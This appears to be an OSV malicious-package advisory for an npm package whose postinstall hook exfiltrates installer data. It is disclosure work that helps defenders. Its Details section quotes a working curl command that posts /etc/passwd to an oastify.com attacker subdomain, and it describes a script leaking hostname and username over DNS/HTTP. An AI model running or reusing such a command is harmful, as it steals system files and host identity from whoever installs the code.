MAL-2026-5409

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@easy-entry/outside-registration-fop-navigator/MAL-2026-5409.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5409
Published
2026-06-09T17:18:57Z
Modified
2026-06-09T18:01:29.959795370Z
Summary
Malicious code in @easy-entry/outside-registration-fop-navigator (npm)
Details

Source: amazon-inspector (04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b)

On npm install, package.json's postinstall hook executes node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, sending the installer's /etc/passwd contents and hostname to a Burp Collaborator subdomain. In parallel, scripts/scream3gg.js hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and issues a fetch to http://<hex>.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com, leaking installer host identity through DNS/HTTP to the attacker. Both behaviors fire automatically and unconditionally on default install.

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-09T17:18:57Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "04091b4e3c6018586c8ba0c6106ff9177090d0776d1a723d041a76d67b1c8f2b",
            "id": "IN-MAL-2026-005025",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.740932319Z"
        },
        {
            "import_time": "2026-06-09T17:45:49.829197796Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "8f3fde652e3e14c71950b1c929e0be830c9e81c44378a2e625e6e9bfea8ab8f6",
            "id": "IN-MAL-2026-005026",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T17:18:57Z"
        }
    ]
}
Affected packages

npm / @easy-entry/outside-registration-fop-navigator

Package

Name
@easy-entry/outside-registration-fop-navigator
Purl
pkg:npm/%40easy-entry%2Foutside-registration-fop-navigator

Affected ranges

Affected versions

99.*
99.9.5

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]